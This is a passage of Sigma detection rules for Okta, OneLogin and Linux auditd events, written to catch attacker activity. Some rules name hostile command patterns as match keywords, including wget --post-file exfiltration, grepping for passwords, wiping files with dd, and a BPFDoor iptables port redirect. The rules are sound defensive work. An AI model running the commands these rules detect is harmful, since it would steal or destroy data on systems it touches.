- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: okta
service: okta
detection:
selection:
eventtype: system.api_token.revoke
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/okta/okta_application_modified_or_deleted.yml
================================================
title: Okta Application Modified or Deleted
id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d
status: test
description: Detects when an application is modified or deleted.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: okta
service: okta
detection:
selection:
eventtype:
- application.lifecycle.update
- application.lifecycle.delete
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/okta/okta_application_sign_on_policy_modified_or_deleted.yml
================================================
title: Okta Application Sign-On Policy Modified or Deleted
id: 8f668cc4-c18e-45fe-ad00-624a981cf88a
status: test
description: Detects when an application Sign-on Policy is modified or deleted.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: okta
service: okta
detection:
selection:
eventtype:
- application.policy.sign_on.update
- application.policy.sign_on.rule.delete
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/okta/okta_fastpass_phishing_detection.yml
================================================
title: Okta FastPass Phishing Detection
id: ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e
status: test
description: Detects when Okta FastPass prevents a known phishing site.
references:
- https://sec.okta.com/fastpassphishingdetection
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2023-05-07
tags:
- attack.initial-access
- attack.t1566
logsource:
product: okta
service: okta
detection:
selection:
outcome.reason: 'FastPass declined phishing attempt'
outcome.result: FAILURE
eventtype: user.authentication.auth_via_mfa
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/identity/okta/okta_identity_provider_created.yml
================================================
title: Okta Identity Provider Created
id: 969c7590-8c19-4797-8c1b-23155de6e7ac
status: test
description: Detects when a new identity provider is created for Okta.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
author: kelnage
date: 2023-09-07
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098.001
logsource:
product: okta
service: okta
detection:
selection:
eventtype: 'system.idp.lifecycle.create'
condition: selection
falsepositives:
- When an admin creates a new, authorised identity provider.
level: medium
================================================
FILE: rules/identity/okta/okta_mfa_reset_or_deactivated.yml
================================================
title: Okta MFA Reset or Deactivated
id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0
status: test
description: Detects when an attempt at deactivating or resetting MFA.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-21
modified: 2022-10-09
tags:
- attack.persistence
- attack.credential-access
- attack.defense-evasion
- attack.t1556.006
logsource:
product: okta
service: okta
detection:
selection:
eventtype:
- user.mfa.factor.deactivate
- user.mfa.factor.reset_all
condition: selection
falsepositives:
- If a MFA reset or deactivated was performed by a system administrator.
level: medium
================================================
FILE: rules/identity/okta/okta_network_zone_deactivated_or_deleted.yml
================================================
title: Okta Network Zone Deactivated or Deleted
id: 9f308120-69ed-4506-abde-ac6da81f4310
status: test
description: Detects when an Network Zone is Deactivated or Deleted.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: okta
service: okta
detection:
selection:
eventtype:
- zone.deactivate
- zone.delete
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/okta/okta_new_behaviours_admin_console.yml
================================================
title: Okta New Admin Console Behaviours
id: a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9
status: test
description: Detects when Okta identifies new activity in the Admin Console.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
author: kelnage
date: 2023-09-07
modified: 2024-06-26
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078.004
logsource:
product: okta
service: okta
detection:
selection_event:
eventtype: 'policy.evaluate_sign_on'
target.displayname: 'Okta Admin Console'
selection_positive:
- debugcontext.debugdata.behaviors|contains: 'POSITIVE'
- debugcontext.debugdata.logonlysecuritydata|contains: 'POSITIVE'
condition: all of selection_*
falsepositives:
- When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual.
level: high
================================================
FILE: rules/identity/okta/okta_password_in_alternateid_field.yml
================================================
title: Potential Okta Password in AlternateID Field
id: 91b76b84-8589-47aa-9605-c837583b82a9
status: test
description: |
Detects when a user has potentially entered their password into the
username field, which will cause the password to be retained in log files.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data
- https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm
author: kelnage
date: 2023-04-03
modified: 2023-10-25
tags:
- attack.credential-access
- attack.t1552
logsource:
product: okta
service: okta
detection:
selection:
legacyeventtype: 'core.user_auth.login_failed'
filter_main:
# Okta service account names start with 0oa
# Email addresses are the default format for Okta usernames, so attempt
# to exclude alternateIds that look like valid emails
# If your Okta configuration uses different character restrictions, you
# will need to update this regular expression to reflect that or disable the rule for your environment
# Possible false negatives are failed login attempts with a password that looks like a valid email address
actor.alternateid|re: '(^0oa.*|[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,10})'
condition: selection and not filter_main
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/identity/okta/okta_policy_modified_or_deleted.yml
================================================
title: Okta Policy Modified or Deleted
id: 1667a172-ed4c-463c-9969-efd92195319a
status: test
description: Detects when an Okta policy is modified or deleted.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: okta
service: okta
detection:
selection:
eventtype:
- policy.lifecycle.update
- policy.lifecycle.delete
condition: selection
falsepositives:
- Okta Policies being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/identity/okta/okta_policy_rule_modified_or_deleted.yml
================================================
title: Okta Policy Rule Modified or Deleted
id: 0c97c1d3-4057-45c9-b148-1de94b631931
status: test
description: Detects when an Policy Rule is Modified or Deleted.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: okta
service: okta
detection:
selection:
eventtype:
- policy.rule.update
- policy.rule.delete
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/okta/okta_security_threat_detected.yml
================================================
title: Okta Security Threat Detected
id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0
status: test
description: Detects when an security threat is detected in Okta.
references:
- https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.command-and-control
logsource:
product: okta
service: okta
detection:
selection:
eventtype: security.threat.detected
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/okta/okta_suspicious_activity_enduser_report.yml
================================================
title: Okta Suspicious Activity Reported by End-user
id: 07e97cc6-aed1-43ae-9081-b3470d2367f1
status: test
description: Detects when an Okta end-user reports activity by their account as being potentially suspicious.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md
author: kelnage
date: 2023-09-07
tags:
- attack.resource-development
- attack.t1586.003
logsource:
product: okta
service: okta
detection:
selection:
eventtype: 'user.account.report_suspicious_activity_by_enduser'
condition: selection
falsepositives:
- If an end-user incorrectly identifies normal activity as suspicious.
level: high
================================================
FILE: rules/identity/okta/okta_unauthorized_access_to_app.yml
================================================
title: Okta Unauthorized Access to App
id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657
status: test
description: Detects when unauthorized access to app occurs.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: okta
service: okta
detection:
selection:
displaymessage: User attempted unauthorized access to app
condition: selection
falsepositives:
- User might of believe that they had access.
level: medium
================================================
FILE: rules/identity/okta/okta_user_account_locked_out.yml
================================================
title: Okta User Account Locked Out
id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a
status: test
description: Detects when an user account is locked out.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.impact
- attack.t1531
logsource:
product: okta
service: okta
detection:
selection:
displaymessage: Max sign in attempts exceeded
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/okta/okta_user_created.yml
================================================
title: New Okta User Created
id: b6c718dd-8f53-4b9f-98d8-93fdca966969
status: test
description: Detects new user account creation
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
references:
- https://developer.okta.com/docs/reference/api/event-types/
tags:
- attack.credential-access
logsource:
service: okta
product: okta
detection:
selection:
eventtype: 'user.lifecycle.create'
condition: selection
falsepositives:
- Legitimate and authorized user creation
level: informational
================================================
FILE: rules/identity/okta/okta_user_session_start_via_anonymised_proxy.yml
================================================
title: Okta User Session Start Via An Anonymising Proxy Service
id: bde30855-5c53-4c18-ae90-1ff79ebc9578
status: test
description: Detects when an Okta user session starts where the user is behind an anonymising proxy service.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
author: kelnage
date: 2023-09-07
tags:
- attack.defense-evasion
- attack.t1562.006
logsource:
product: okta
service: okta
detection:
selection:
eventtype: 'user.session.start'
securitycontext.isproxy: 'true'
condition: selection
falsepositives:
- If a user requires an anonymising proxy due to valid justifications.
level: high
================================================
FILE: rules/identity/onelogin/onelogin_assumed_another_user.yml
================================================
title: OneLogin User Assumed Another User
id: 62fff148-278d-497e-8ecd-ad6083231a35
status: test
description: Detects when an user assumed another user account.
references:
- https://developers.onelogin.com/api-docs/1/events/event-resource
author: Austin Songer @austinsonger
date: 2021-10-12
modified: 2022-12-25
tags:
- attack.impact
logsource:
product: onelogin
service: onelogin.events
detection:
selection:
event_type_id: 3
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/identity/onelogin/onelogin_user_account_locked.yml
================================================
title: OneLogin User Account Locked
id: a717c561-d117-437e-b2d9-0118a7035d01
status: test
description: Detects when an user account is locked or suspended.
references:
- https://developers.onelogin.com/api-docs/1/events/event-resource/
author: Austin Songer @austinsonger
date: 2021-10-12
modified: 2022-12-25
tags:
- attack.impact
logsource:
product: onelogin
service: onelogin.events
detection:
selection1: # Locked via API
event_type_id: 532
selection2: # Locked via API
event_type_id: 553
selection3: # Suspended via API
event_type_id: 551
condition: 1 of selection*
falsepositives:
- System may lock or suspend user accounts.
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_binary_padding.yml
================================================
title: Binary Padding - Linux
id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba
status: test
description: |
Adversaries may use binary padding to add junk data and change the on-disk representation of malware.
This rule detect using dd and truncate to add a junk data to file.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
author: Igor Fits, oscd.community
date: 2020-10-13
modified: 2023-05-03
tags:
- attack.defense-evasion
- attack.t1027.001
logsource:
product: linux
service: auditd
detection:
selection_execve:
type: 'EXECVE'
keywords_truncate:
'|all':
- 'truncate'
- '-s'
keywords_dd:
'|all':
- 'dd'
- 'if='
keywords_filter:
- 'of='
condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter))
falsepositives:
- Unknown
level: high
simulation:
- type: atomic-red-team
name: Pad Binary to Change Hash - Linux/macOS dd
technique: T1027.001
atomic_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_bpfdoor_port_redirect.yml
================================================
title: Bpfdoor TCP Ports Redirect
id: 70b4156e-50fc-4523-aa50-c9dddf1993fc
status: test
description: |
All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'
The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.
references:
- https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
- https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
author: Rafal Piasecki
date: 2022-08-10
tags:
- attack.defense-evasion
- attack.t1562.004
logsource:
product: linux
service: auditd
detection:
cmd:
type: 'EXECVE'
a0|endswith: 'iptables'
a1: '-t'
a2: 'nat'
keywords:
- '--to-ports 42'
- '--to-ports 43'
condition: cmd and keywords
falsepositives:
- Legitimate ports redirect
level: medium
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_capabilities_discovery.yml
================================================
title: Linux Capabilities Discovery
id: fe10751f-1995-40a5-aaa2-c97ccb4123fe
status: test
description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
references:
- https://man7.org/linux/man-pages/man8/getcap.8.html
- https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
- https://mn3m.info/posts/suid-vs-capabilities/
- https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
author: 'Pawel Mazur'
date: 2021-11-28
modified: 2022-12-25
tags:
- attack.discovery
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1083
- attack.t1548
logsource:
product: linux
service: auditd
detection:
selection:
type: EXECVE
a0: getcap
a1: '-r'
a2: '/'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_change_file_time_attr.yml
================================================
title: File Time Attribute Change - Linux
id: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b
status: test
description: Detect file time attribute change to hide new or changes to existing files.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
author: 'Igor Fits, oscd.community'
date: 2020-10-15
modified: 2022-11-28
tags:
- attack.defense-evasion
- attack.t1070.006
logsource:
product: linux
service: auditd
detection:
execve:
type: 'EXECVE'
touch:
- 'touch'
selection2:
- '-t'
- '-acmr'
- '-d'
- '-r'
condition: execve and touch and selection2
falsepositives:
- Unknown
level: medium
simulation:
- type: atomic-red-team
name: Set a file's access timestamp
technique: T1070.006
atomic_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
- type: atomic-red-team
name: Set a file's modification timestamp
technique: T1070.006
atomic_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
- type: atomic-red-team
name: Modify file timestamps using reference file
technique: T1070.006
atomic_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_chattr_immutable_removal.yml
================================================
title: Remove Immutable File Attribute - Auditd
id: a5b977d6-8a81-4475-91b9-49dbfcd941f7
status: test
description: Detects removing immutable file attribute.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
author: Jakob Weinzettl, oscd.community
date: 2019-09-23
modified: 2022-11-26
tags:
- attack.defense-evasion
- attack.t1222.002
logsource:
product: linux
service: auditd
detection:
selection:
type: 'EXECVE'
a0|contains: 'chattr'
a1|contains: '-i'
condition: selection
falsepositives:
- Administrator interacting with immutable files (e.g. for instance backups).
level: medium
simulation:
- type: atomic-red-team
name: Remove immutable file attribute
technique: T1222.002
atomic_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_clipboard_collection.yml
================================================
title: Clipboard Collection with Xclip Tool - Auditd
id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf
status: test
description: |
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.
Xclip has to be installed.
Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
references:
- https://linux.die.net/man/1/xclip
- https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/
author: 'Pawel Mazur'
date: 2021-09-24
modified: 2022-11-26
tags:
- attack.collection
- attack.t1115
logsource:
product: linux
service: auditd
detection:
selection:
type: EXECVE
a0: xclip
a1:
- '-selection'
- '-sel'
a2:
- clipboard
- clip
a3: '-o'
condition: selection
falsepositives:
- Legitimate usage of xclip tools
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_clipboard_image_collection.yml
================================================
title: Clipboard Collection of Image Data with Xclip Tool
id: f200dc3f-b219-425d-a17e-c38467364816
status: test
description: |
Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.
Xclip has to be installed.
Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
references:
- https://linux.die.net/man/1/xclip
author: 'Pawel Mazur'
date: 2021-10-01
modified: 2022-10-09
tags:
- attack.collection
- attack.t1115
logsource:
product: linux
service: auditd
detection:
selection:
type: EXECVE
a0: xclip
a1:
- '-selection'
- '-sel'
a2:
- clipboard
- clip
a3: '-t'
a4|startswith: 'image/'
a5: '-o'
condition: selection
falsepositives:
- Legitimate usage of xclip tools
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_coinminer.yml
================================================
title: Possible Coin Miner CPU Priority Param
id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed
status: test
description: Detects command line parameter very often used with coin miners
references:
- https://xmrig.com/docs/miner/command-line-options
author: Florian Roth (Nextron Systems)
date: 2021-10-09
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.t1068
logsource:
product: linux
service: auditd
detection:
cmd1:
a1|startswith: '--cpu-priority'
cmd2:
a2|startswith: '--cpu-priority'
cmd3:
a3|startswith: '--cpu-priority'
cmd4:
a4|startswith: '--cpu-priority'
cmd5:
a5|startswith: '--cpu-priority'
cmd6:
a6|startswith: '--cpu-priority'
cmd7:
a7|startswith: '--cpu-priority'
condition: 1 of cmd*
falsepositives:
- Other tools that use a --cpu-priority flag
level: critical
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_data_compressed.yml
================================================
title: Data Compressed
id: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee
status: test
description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md
author: Timur Zinniatullin, oscd.community
date: 2019-10-21
modified: 2023-07-28
tags:
- attack.exfiltration
- attack.collection
- attack.t1560.001
logsource:
product: linux
service: auditd
detection:
selection1:
type: 'execve'
a0: 'zip'
selection2:
type: 'execve'
a0: 'gzip'
a1: '-k'
selection3:
type: 'execve'
a0: 'tar'
a1|contains: '-c'
condition: 1 of selection*
falsepositives:
- Legitimate use of archiving tools by legitimate user.
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_data_exfil_wget.yml
================================================
title: Data Exfiltration with Wget
id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc
status: test
description: |
Detects attempts to post the file with the usage of wget utility.
The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
references:
- https://linux.die.net/man/1/wget
- https://gtfobins.github.io/gtfobins/wget/
author: 'Pawel Mazur'
date: 2021-11-18
modified: 2022-12-25
tags:
- attack.exfiltration
- attack.t1048.003
logsource:
product: linux
service: auditd
detection:
selection:
type: EXECVE
a0: wget
a1|startswith: '--post-file='
condition: selection
falsepositives:
- Legitimate usage of wget utility to post a file
level: medium
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_dd_delete_file.yml
================================================
title: Overwriting the File with Dev Zero or Null
id: 37222991-11e9-4b6d-8bdf-60fbe48f753e
status: stable
description: Detects overwriting (effectively wiping/deleting) of a file.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
author: Jakob Weinzettl, oscd.community
date: 2019-10-23
tags:
- attack.impact
- attack.t1485
logsource:
product: linux
service: auditd
detection:
selection:
type: 'EXECVE'
a0|contains: 'dd'
a1|contains:
- 'if=/dev/null'
- 'if=/dev/zero'
condition: selection
falsepositives:
- Appending null bytes to files.
- Legitimate overwrite of files.
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_file_or_folder_permissions.yml
================================================
title: File or Folder Permissions Change
id: 74c01ace-0152-4094-8ae2-6fd776dd43e5
status: test
description: Detects file and folder permission changes.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
author: Jakob Weinzettl, oscd.community
date: 2019-09-23
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.t1222.002
logsource:
product: linux
service: auditd
detection:
selection:
type: 'EXECVE'
a0|contains:
- 'chmod'
- 'chown'
condition: selection
falsepositives:
- User interacting with files permissions (normal/daily behaviour).
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_find_cred_in_files.yml
================================================
title: Credentials In Files - Linux
id: df3fcaea-2715-4214-99c5-0056ea59eb35
status: test
description: 'Detecting attempts to extract passwords with grep'
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
author: 'Igor Fits, oscd.community'
date: 2020-10-15
modified: 2023-04-30
tags:
- attack.credential-access
- attack.t1552.001
logsource:
product: linux
service: auditd
detection:
selection:
type: 'EXECVE'
keywords:
'|all':
- 'grep'
- 'password'
condition: selection and keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_hidden_files_directories.yml
================================================
title: Hidden Files and Directories
id: d08722cd-3d09-449a-80b4-83ea2d9d4616
status: test
description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
author: 'Pawel Mazur'
date: 2021-09-06
modified: 2025-06-16
tags:
- attack.defense-evasion
- attack.t1564.001
logsource:
product: linux
service: auditd
detection:
selection_commands:
type: 'EXECVE'
a0:
- 'mkdir'
- 'nano'
- 'touch'
- 'vi'
- 'vim'
selection_arguments:
- a1|re: '(^|\/)\.[^.\/]'
- a2|re: '(^|\/)\.[^.\/]'
condition: all of selection_*
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_hidden_zip_files_steganography.yml
================================================
title: Steganography Hide Zip Information in Picture File
id: 45810b50-7edc-42ca-813b-bdac02fb946b
status: test
description: Detects appending of zip file to image
references:
- https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/
author: 'Pawel Mazur'
date: 2021-09-09
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1027.003
logsource:
product: linux
service: auditd
detection:
commands:
type: EXECVE
a0: cat
a1:
a1|endswith:
- '.jpg'
- '.png'
a2:
a2|endswith: '.zip'
condition: commands and a1 and a2
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_masquerading_crond.yml
================================================
title: Masquerading as Linux Crond Process
id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0
status: test
description: |
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.
Several different variations of this technique have been observed.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process
author: Timur Zinniatullin, oscd.community
date: 2019-10-21
modified: 2023-08-22
tags:
- attack.defense-evasion
- attack.t1036.003
logsource:
product: linux
service: auditd
detection:
selection:
type: 'execve'
a0: 'cp'
a1: '/bin/sh'
a2|endswith: '/crond'
condition: selection
level: medium
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_modify_system_firewall.yml
================================================
title: Modify System Firewall
id: 323ff3f5-0013-4847-bbd4-250b5edb62cc
related:
- id: 53059bc0-1472-438b-956a-7508a94a91f0
type: similar
status: test
description: |
Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.
Detection rules that match only on the disabling of firewalls will miss this.
references:
- https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html
- https://blog.aquasec.com/container-security-tnt-container-attack
- https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking
author: IAI
date: 2023-03-06
modified: 2025-10-12
tags:
- attack.t1562.004
- attack.defense-evasion
logsource:
product: linux
service: auditd
detection:
selection1:
type: 'EXECVE'
a0: 'iptables'
a1|contains: 'DROP'
selection2:
type: 'EXECVE'
a0: 'firewall-cmd'
a1|contains: 'remove'
selection3:
type: 'EXECVE'
a0: 'ufw'
a1|contains: 'delete'
selection4:
type: 'EXECVE'
a0: 'nft'
a1|contains:
- 'delete'
- 'flush'
condition: 1 of selection*
falsepositives:
- Legitimate admin activity
level: medium
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_network_sniffing.yml
================================================
title: Network Sniffing - Linux
id: f4d3748a-65d1-4806-bd23-e25728081d01
status: test
description: |
Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
author: Timur Zinniatullin, oscd.community
date: 2019-10-21
modified: 2022-12-18
tags:
- attack.credential-access
- attack.discovery
- attack.t1040
logsource:
product: linux
service: auditd
detection:
selection_1:
type: 'execve'
a0: 'tcpdump'
a1: '-c'
a3|contains: '-i'
selection_2:
type: 'execve'
a0: 'tshark'
a1: '-c'
a3: '-i'
condition: 1 of selection_*
falsepositives:
- Legitimate administrator or user uses network sniffing tool for legitimate reasons.
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_screencapture_import.yml
================================================
title: Screen Capture with Import Tool
id: dbe4b9c5-c254-4258-9688-d6af0b7967fd
status: test
description: |
Detects adversary creating screen capture of a desktop with Import Tool.
Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.
ImageMagick must be installed.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md
- https://linux.die.net/man/1/import
- https://imagemagick.org/
author: 'Pawel Mazur'
date: 2021-09-21
modified: 2022-10-09
tags:
- attack.collection
- attack.t1113
logsource:
product: linux
service: auditd
detection:
import:
type: EXECVE
a0: import
import_window_root:
a1: '-window'
a2: 'root'
a3|endswith:
- '.png'
- '.jpg'
- '.jpeg'
import_no_window_root:
a1|endswith:
- '.png'
- '.jpg'
- '.jpeg'
condition: import and (import_window_root or import_no_window_root)
falsepositives:
- Legitimate use of screenshot utility
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_screencaputre_xwd.yml
================================================
title: Screen Capture with Xwd
id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c
status: test
description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture
- https://linux.die.net/man/1/xwd
author: 'Pawel Mazur'
date: 2021-09-13
modified: 2022-12-18
tags:
- attack.collection
- attack.t1113
logsource:
product: linux
service: auditd
detection:
selection:
type: EXECVE
a0: xwd
xwd_root_window:
a1: '-root'
a2: '-out'
a3|endswith: '.xwd'
xwd_no_root_window:
a1: '-out'
a2|endswith: '.xwd'
condition: selection and 1 of xwd_*
falsepositives:
- Legitimate use of screenshot utility
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_steghide_embed_steganography.yml
================================================
title: Steganography Hide Files with Steghide
id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280
status: test
